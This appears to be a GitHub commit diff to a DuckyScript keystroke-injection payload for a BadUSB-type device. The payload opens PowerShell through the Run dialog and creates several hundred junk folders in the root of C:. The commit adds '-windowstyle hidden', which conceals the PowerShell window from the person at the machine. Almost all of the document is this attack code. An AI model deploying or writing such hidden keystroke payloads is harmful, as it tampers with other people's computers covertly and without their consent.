Update create folders in C.txt

This commit is contained in:
Yann
2023-03-31 09:00:32 +02:00
committed by GitHub
parent fd087069b7
commit 2452d1c08c
+2 -2
View File
@@ -4,7 +4,7 @@ REM Version: 1.0
DELAY 1000
GUI r
DELAY 500
STRING powershell
STRING powershell -windowstyle hidden
ENTER
DELAY 900
STRING (1..300) | % {new-item -type directory -path "C:\_331232ADA-$_"}
@@ -14,4 +14,4 @@ STRING (1..200) | % {new-item -type directory -path "C:\fdsA$_AAA$_"}
ENTER
DELAY 4000
STRING (1..200) | % {new-item -type directory -path "C:\_$_"}
ENTER
ENTER